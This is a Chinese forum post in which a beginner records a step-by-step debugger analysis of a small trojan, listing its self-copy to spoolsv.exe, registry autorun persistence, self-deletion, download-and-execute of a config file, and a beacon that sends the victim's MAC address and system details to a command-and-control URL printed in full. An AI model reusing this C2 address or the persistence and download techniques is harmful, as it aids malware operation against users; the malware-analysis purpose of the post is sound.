本帖最后由 chishubiao 于 2014-9-22 21:15 编辑
之前在浏览论坛的一个帖子,看到http://www.52pojie.cn/thread-247471-1-1.html
觉得只有20k,应该挺好玩的,于是下载了下来,但是一直没有分析,今天分析一马的时候需要dump一块区域下来,误把这个文件当作dump下来的文件分析,分析到差不多的时候才发现不对劲,于是索性将错就错把该马的分析过程记录下来。
整理好文档之后正准备发的时候才发现论坛里已经有人发出这个帖子了。。见http://www.52pojie.cn/thread-253648-1-1.html 汗。。
不过既然整理出来了还是发一下,本人还是一样从作为我这样一个菜鸟的角度来谈如何分析这个菜鸟们最最适合上手的木马。
1。先跑跑行为,有了行为做指引后面的分析就会变得极其容易。
可以看到它创建了文件,修改了注册表,有网络通信,有自删除的功能,心里默默记住就好
2。看看壳,vc++的,没壳,没附加数据,不用做处理了。
3。载入IDA或者OD,因为既然可以跑出行为,代码量又特别少,那直接就OD单部跟着走,边走边坐标记。
获取c:\windows\system\spoolsv.exe属性 若不存在,则copy当前文件至c:\windows\system\spoolsv.exe
copy
500ms后执行当前文件,设置进程优先级为实时,删除自身,并退出
setprority
如果是目录,删除该名字的目录,copy当前文件至c:\windows\system\spoolsv.exe ,执行当前文件,设置进程优先级为实时,并删除自身,删除时都使用createRemoteProcess
del
通过设置注册表HKEY_LOCAL_MACHINE\Software\Microft\Windows\CurrentVersionRun使其能开机自启动.
run
使用URLDownLoadToFile下载文件到本地的fuck.ini,并使用WinExec执行
download
调用GetPrivateProfileStringA来获得fuck.ini中的配置:
read ini
查查关于读取ini的资料,不难写出 fuck.ini结构: [x0] jc=进程 mz= ys= url= 调用了createToolHelp32SnapShot,Process32First,Process32Next遍历所有进程,搜索jc 获取系统的版本,mac地址等信息,调用InternetOpenUrl按照如下地址和格式发送: 00404134 "http://121.12.115.10:1111/count.asp?mac=080027659CC0&ver=20120919&makedate=&userID=ceo&ComPut=USER-20140909BM&os=Windows XP&key=nb20548ccccccccccccccccccccccccc&explorer="
getver
清理痕迹
del cache
注意单步的时候遇到不会的API现搜就行 ,注意参数传递,之所以说它好上手是因为无壳,无任何代码加密,流程简单,所涉及到API都是很常见的API,各位可以拿这个练练手。
| 
[复制链接]
发表于 2014-9-22 21:12
|
发表于 2014-9-22 21:25
发表于 2014-10-1 23:59
